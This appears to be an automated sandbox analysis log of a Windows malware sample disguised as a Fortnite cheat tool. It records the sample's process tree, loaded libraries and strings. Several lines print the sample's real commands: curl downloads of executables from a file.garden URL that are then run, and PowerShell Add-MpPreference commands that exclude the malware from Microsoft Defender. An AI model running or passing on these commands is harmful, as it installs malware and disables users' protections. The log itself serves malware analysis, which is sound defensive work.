                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_0016A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,5_2_0016A6C2
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Program Files (x86)\Microsoft\Edge\Application\CSCF5F43EE1A3D5479687C855494E4EF77.TMP
                                Source: C:\Windows\Speech\physmeme.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\physmeme.exe.logJump to behavior
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3380:120:WilError_03
                                Source: C:\Edge\msedge.exeMutant created: NULL
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4200:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7040:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1148:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2976:120:WilError_03
                                Source: C:\Edge\msedge.exeMutant created: \Sessions\1\BaseNamedObjects\Local\JFIOSDHSUDFHUSIDGHHDJCXZCHBKLJZGVHSKDFGOIUYDSGYOIYD
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3136:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4472:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3772:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4864:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4940:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1508:120:WilError_03
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\AppData\Local\Temp\srvpqulvJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat" "
                                Source: C:\Windows\Speech\kdmapper.exeCommand line argument: sfxname5_2_0016DF1E
                                Source: C:\Windows\Speech\kdmapper.exeCommand line argument: sfxstime5_2_0016DF1E
                                Source: C:\Windows\Speech\kdmapper.exeCommand line argument: STARTDLG5_2_0016DF1E
                                Source: 4tXm5yPtiy.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: C:\Edge\msedge.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Edge\msedge.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Edge\msedge.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Edge\msedge.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Edge\msedge.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Edge\msedge.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: 4tXm5yPtiy.exeReversingLabs: Detection: 57%
                                Source: 4tXm5yPtiy.exeString found in binary or memory: Save/Load
                                Source: 4tXm5yPtiy.exeString found in binary or memory: Save/Load
                                Source: 4tXm5yPtiy.exeString found in binary or memory: CombatVisualsWeaponConfigMisc##MainAimbotPredictionTriggerbotTriggerbot Delay (ms)Triggerbot Distance (m)Fov CircleFilled FovFov SizeSmoothingHitboxCorner 2D 3D NothingRankDraw FilledUsernameSnaplineSkeletonFov ArrowsDistanceRender CountWeapon configShotgun SettingsShotgun SmoothShotgun FovSMG SettingsPrediction SMG SmoothSMG FovRifle SettingsPrediction Rifle SmoothRifle FovSniper SettingsPrediction Sniper SmoothSniper Fov(AIR STUCK)RISKY FEATURE:Air StuckUnload##Main1Save/LoadSave Configconfig.jsonLoad Config##MainsLegit ConfigSemi ConfigRage ConfigReaper Sniper RifleBolt-Action Sniper RifleHeavy Sniper RifleStorm Scout Sniper RifleHunting RiflePump ShotgunTactical ShotgunCharge ShotgunSuppressed SMGCompact SMGRapid Fire SMGAssault RifleBurst Assault RifleTactical Assault RifleThermal Scoped Assault RifleScoped Assault RiflePumpShotgunTacticalShotgunChargeShotgunLeverActionShotgunDragonBreathShotgunDoubleBarrelShotgunAutoShotgunSingleShotgunCombatShotgunSlugShotgunVisible Entities: Nearby Entities: HandsBronze 1Bronze 2Bronze 3Silver 1Silver 2Silver 3Gold 1Gold 2Gold 3Platinum 1Platinum 2Platinum 3Diamond 1Diamond 2Diamond 3EliteChampionUnrealUnrankedm] Load Dependencies (Close Game First) Inject Orqur Your choice: cls Driver FoundDriver Error Contact Support. Waiting For FortniteFortniteClient-Win64-Shipping.exeThe driver could not get the base address...Base Address -> VAText -> cr3 -> vector too longd}a
                                Source: unknownProcess created: C:\Users\user\Desktop\4tXm5yPtiy.exe "C:\Users\user\Desktop\4tXm5yPtiy.exe"
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeProcess created: C:\Windows\Speech\kdmapper.exe "C:\Windows\Speech\kdmapper.exe"
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe
                                Source: C:\Windows\Speech\kdmapper.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe"
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeProcess created: C:\Windows\Speech\physmeme.exe "C:\Windows\Speech\physmeme.exe"
                                Source: C:\Windows\Speech\physmeme.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\Speech\physmeme.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat" "
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Edge\msedge.exe "C:\Edge/msedge.exe"
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\srvpqulv\srvpqulv.cmdline"
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: unknownProcess created: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe
                                Source: unknownProcess created: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3594.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCF5F43EE1A3D5479687C855494E4EF77.TMP"
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c1gtejqg\c1gtejqg.cmdline"
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES37B7.tmp" "c:\Windows\System32\CSC97DCA7013344A2AA8495395955A7A7.TMP"
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe'
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Edge\msedge.exe'
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zugvBzMsRZ.bat"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                Source: unknownProcess created: C:\Edge\msedge.exe C:\Edge\msedge.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                Source: unknownProcess created: C:\Edge\msedge.exe C:\Edge\msedge.exe
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Edge\msedge.exe "C:\Edge\msedge.exe"
                                Source: unknownProcess created: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe "C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe"
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qFKlxXtZuP.bat"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe "C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe"
                                Source: unknownProcess created: C:\Edge\msedge.exe "C:\Edge\msedge.exe"
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5CZTOTC2vN.bat" "
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                Source: unknownProcess created: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe "C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe"
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\4evtisdSvL.bat"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Edge\msedge.exe "C:\Edge\msedge.exe"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exeJump to behavior
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeProcess created: C:\Windows\Speech\kdmapper.exe "C:\Windows\Speech\kdmapper.exe" Jump to behavior
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exeJump to behavior
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeProcess created: C:\Windows\Speech\physmeme.exe "C:\Windows\Speech\physmeme.exe" Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exeJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe" Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exeJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat" "Jump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Edge\msedge.exe "C:\Edge/msedge.exe"Jump to behavior
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\srvpqulv\srvpqulv.cmdline"Jump to behavior
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c1gtejqg\c1gtejqg.cmdline"Jump to behavior
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe'Jump to behavior
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Edge\msedge.exe'Jump to behavior
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zugvBzMsRZ.bat" Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3594.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCF5F43EE1A3D5479687C855494E4EF77.TMP"
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qFKlxXtZuP.bat"
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES37B7.tmp" "c:\Windows\System32\CSC97DCA7013344A2AA8495395955A7A7.TMP"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Edge\msedge.exe "C:\Edge\msedge.exe"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe "C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe"
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\4evtisdSvL.bat"
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5CZTOTC2vN.bat" "
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Edge\msedge.exe "C:\Edge\msedge.exe"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeSection loaded: d3d9.dllJump to behavior
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeSection loaded: dwmapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeSection loaded: msvcp140.dllJump to behavior
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeSection loaded: vcruntime140_1.dllJump to behavior
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeSection loaded: vcruntime140.dllJump to behavior
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeSection loaded: vcruntime140.dllJump to behavior
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeSection loaded: vcruntime140_1.dllJump to behavior
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeSection loaded: vcruntime140.dllJump to behavior
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: schannel.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: mskeyprotect.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: ncryptsslp.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: dxgidebug.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: dwmapi.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: riched20.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: usp10.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: msls31.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: windowscodecs.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: textinputframework.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: coreuicomponents.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: policymanager.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: msvcp110_win.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
